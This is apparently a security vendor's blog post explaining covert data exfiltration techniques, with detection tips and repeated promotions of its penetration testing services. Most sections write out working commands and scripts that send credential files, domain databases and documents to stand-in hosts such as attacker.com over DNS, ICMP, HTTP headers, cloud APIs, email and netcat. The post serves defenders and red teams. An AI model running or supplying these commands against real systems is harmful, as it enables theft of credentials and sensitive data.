Data exfiltration is one of the most dangerous phases of a cyberattack. After an attacker gains initial access and moves laterally through a network, the final and often most damaging step is getting the stolen data out, quietly, without triggering alerts, and without leaving a trace. Understanding how this is done is critical for defenders, red teams, and security leaders who want to stay ahead of modern threat actors.
This blog breaks down the most effective and covert data exfiltration techniques used in real-world attacks, along with the commands and tools associated with each method, so you know exactly what to look for and what you might be missing.
Data exfiltration refers to the unauthorized transfer of data from a target environment to an attacker-controlled destination. Unlike noisy attacks like ransomware, exfiltration-focused threat actors prioritize stealth. They often operate for weeks or months inside a network before a single byte of data leaves, making detection extremely difficult.
According to the MITRE ATT&CK framework, exfiltration is a dedicated tactic category with over a dozen documented techniques, each exploiting different gaps in network monitoring, endpoint visibility, and behavioral analytics.
Whether you are dealing with nation-state adversaries, financially motivated cybercriminals, or insider threats, the playbook is largely the same: blend in with legitimate traffic, avoid detection thresholds, and get the data out slowly and quietly.
If your organization has never had a real-world penetration test that specifically targets exfiltration paths, you are almost certainly exposed. Redfox Cybersecurity's penetration testing services are built to identify exactly these gaps before a real attacker exploits them.
DNS is one of the most trusted protocols on any network. Firewalls rarely block outbound DNS traffic, and many organizations do not inspect DNS payloads at all. Attackers exploit this by encoding stolen data inside DNS queries and responses, effectively turning the DNS protocol into a covert communication and exfiltration channel.
Tools like dnscat2 and iodine are commonly used for this. Here is what a basic DNS tunneling session looks like using dnscat2:
On the attacker's server (with a registered domain like attacker.com):
ruby dnscat2.rb --dns "domain=tunnel.attacker.com,host=0.0.0.0" --no-cache
[cta]
On the compromised client:
./dnscat --dns domain=tunnel.attacker.com
[cta]
Once the tunnel is established, the attacker can issue commands and exfiltrate files through DNS TXT, MX, or A record queries. Each query carries a small chunk of encoded data, and the full payload is reassembled at the attacker-controlled DNS server.
DNS tunneling is effective because it uses an allowed protocol, the payloads are base64-encoded and look like random subdomain strings, and query volume can be throttled to avoid anomaly thresholds.
Blue teams should look for high volumes of DNS queries to a single external domain, unusually long subdomain strings (over 50 characters), and DNS TXT record queries from internal hosts, which are rarely legitimate.
Attackers frequently abuse legitimate cloud platforms, such as Google Drive, Dropbox, OneDrive, Slack, Pastebin, and GitHub, to exfiltrate data. Since traffic to these services is encrypted over HTTPS and appears completely normal, it blends seamlessly into legitimate user activity.
A Python-based exfiltration script using the Dropbox API might look like this:
import dropbox
import os
dbx = dropbox.Dropbox('ATTACKER_API_TOKEN')
with open('/etc/passwd', 'rb') as f:
dbx.files_upload(f.read(), '/exfil/passwd.txt')
[cta]
Alternatively, attackers might use curl to POST data to a Pastebin-like service:
curl -s -d "api_dev_key=APIKEY&api_option=paste&api_paste_code=$(cat /etc/shadow | base64)" https://pastebin.com/api/api_post.php
[cta]
Both methods produce outbound HTTPS traffic that is functionally indistinguishable from normal SaaS usage without deep packet inspection or application-layer monitoring.
Most organizations whitelist major cloud platforms entirely. Even organizations with SSL inspection often exclude certain domains for privacy or performance reasons, leaving these vectors wide open.
This is precisely the kind of blind spot that a professional red team engagement from Redfox Cybersecurity is designed to expose. Our adversary simulation exercises use real attacker tooling to test whether your SOC can detect this class of exfiltration.
Steganography involves hiding data inside innocent-looking files such as images, audio files, or PDFs. An attacker who has already exfiltrated access can encode sensitive data inside an image file and upload it to a public image hosting site, a company Slack channel, or even email it out as a "screenshot."
Using the steghide tool on Linux:
# Embed a sensitive file into an image
steghide embed -cf company_logo.jpg -sf /tmp/credentials.txt -p "secretpassword"
# Extract on the attacker's machine
steghide extract -sf company_logo.jpg -p "secretpassword"
[cta]
Alternatively, for PNG files, zsteg or openstego can be used. A more programmatic approach using Python and the Pillow library encodes data in the least significant bits (LSB) of pixel values, making the modification invisible to the human eye and undetectable by hash-based file inspection.
Steganography bypasses virtually every DLP (Data Loss Prevention) solution that does not perform content-level analysis. File size, MIME type, and hash values all appear normal. The only reliable detection method is statistical analysis of pixel entropy or dedicated steganalysis tools, which most organizations do not deploy.
Like DNS, ICMP (the protocol behind the ping command) is almost universally allowed through firewalls. Attackers have long exploited ICMP echo request and reply packets to carry hidden payloads.
Tools like ptunnel and icmpsh are purpose-built for this. Here is an example using icmpsh:
On the attacker's machine (acting as the master):
python icmpsh_m.py <attacker_IP> <victim_IP>
[cta]
On the compromised target:
icmpsh.exe -t <attacker_IP> -d 500 -b 30 -s 128
[cta]
Data can also be manually embedded in ICMP payloads using Scapy in Python:
from scapy.all import *
data = open('/etc/passwd', 'r').read()
chunk_size = 32
chunks = [data[i:i+chunk_size] for i in range(0, len(data), chunk_size)]
for chunk in chunks:
pkt = IP(dst="attacker.com")/ICMP()/Raw(load=chunk)
send(pkt, verbose=0)
[cta]
Each ping carries a chunk of sensitive data inside the payload field. Reassembled on the receiving end, the full dataset is recovered without a single TCP connection being established.
Monitor for ICMP packets with unusually large or non-zero payloads, high-frequency pings to external IPs, and ICMP traffic to destinations outside your normal geographic baseline.
Slow and low exfiltration refers to the deliberate throttling of data transfer to stay below detection thresholds. Instead of sending large amounts of data at once, attackers break it into tiny fragments and transmit them over an extended period, sometimes days or weeks.
One sophisticated variant involves encoding data inside HTTP request headers:
import requests
import base64
data = open('sensitive.doc', 'rb').read()
encoded = base64.b64encode(data).decode()
chunk_size = 50
for i in range(0, len(encoded), chunk_size):
chunk = encoded[i:i+chunk_size]
headers = {
'User-Agent': 'Mozilla/5.0',
'X-Custom-Header': chunk,
'Accept-Language': 'en-US'
}
requests.get('https://attacker-controlled-site.com/beacon', headers=headers)
[cta]
Each request looks like routine web browsing. The data travels inside a custom HTTP header that most perimeter tools do not log or inspect.
Timing channels take this even further. Instead of encoding data in packet content, data is encoded in the timing intervals between packets, a technique that is almost impossible to detect with traditional signature-based tools.
Attackers with access to internal mail systems or compromised user accounts frequently exfiltrate data by emailing it to external accounts, often via encrypted ZIP attachments or password-protected documents that DLP solutions cannot inspect.
A simple PowerShell-based exfiltration via email from a compromised Windows host:
$SMTPServer = "smtp.gmail.com"
$SMTPFrom = "compromised_user@company.com"
$SMTPTo = "attacker@protonmail.com"
$Username = "compromised_user@company.com"
$Password = "compromised_password"
$attachment = "C:\Users\victim\Documents\financials.xlsx"
Compress-Archive -Path $attachment -DestinationPath C:\Temp\data.zip
$message = New-Object System.Net.Mail.MailMessage
$message.From = $SMTPFrom
$message.To.Add($SMTPTo)
$message.Subject = "Q3 Report"
$message.Body = "See attached."
$message.Attachments.Add((New-Object System.Net.Mail.Attachment("C:\Temp\data.zip")))
$smtp = New-Object Net.Mail.SmtpClient($SMTPServer, 587)
$smtp.EnableSSL = $true
$smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password)
$smtp.Send($message)
[cta]
This approach is particularly effective against organizations that trust internal email accounts by default and do not inspect outbound attachments or flag unusual recipient domains.
Living-off-the-land (LotL) exfiltration uses tools already present on the target system to move data out, avoiding the need to introduce any new binaries that endpoint detection tools might flag.
On Windows systems, certutil, bitsadmin, and PowerShell are commonly abused:
# Encode sensitive file to base64 and send via PowerShell web request
$content = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\admin\ntds.dit"))
Invoke-WebRequest -Uri "https://attacker.com/collect" -Method POST -Body $content
[cta]
On Linux systems, curl, wget, and nc (netcat) serve the same purpose:
# Exfiltrate /etc/shadow using netcat
cat /etc/shadow | nc attacker.com 4444
# Or using curl with base64 encoding
curl -s -X POST https://attacker.com/collect -d "data=$(cat /etc/shadow | base64)"
[cta]
Because these are trusted, signed system binaries, most security tools do not flag their execution by default. Detection requires behavioral baselines and parent-process analysis.
Understanding these techniques is only half the battle. Effective defense requires layered controls, including full SSL inspection on all outbound traffic, DNS query logging and anomaly detection, DLP solutions with content-aware inspection, behavioral analytics to detect low-and-slow transfer patterns, egress filtering to restrict outbound connections to known-good destinations, and endpoint detection and response (EDR) platforms with LotL detection capabilities.
Most importantly, organizations need to regularly test whether these defenses actually work under real attack conditions.
That is exactly where Redfox Cybersecurity's penetration testing and red team services come in. Our team of certified ethical hackers simulates the full attack lifecycle, including advanced exfiltration techniques, to identify gaps in your detection and response capabilities before a real threat actor does.
Stealthy data exfiltration is not a theoretical threat. These techniques are actively used in ransomware pre-deployment campaigns, APT operations, corporate espionage, and insider threat scenarios. The complexity of modern environments, heavy reliance on cloud services, and the sheer volume of outbound traffic make detection extraordinarily difficult without purpose-built testing and tooling.
The organizations that catch these attacks early are the ones that proactively test their own defenses. If you have not validated your exfiltration detection capabilities recently, now is the time.
Contact Redfox Cybersecurity today to schedule a penetration test tailored to your environment. Our adversary simulation, red team, and network penetration testing engagements are designed to surface exactly the kind of stealthy exfiltration paths described in this post, so you can fix them before they become headlines.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
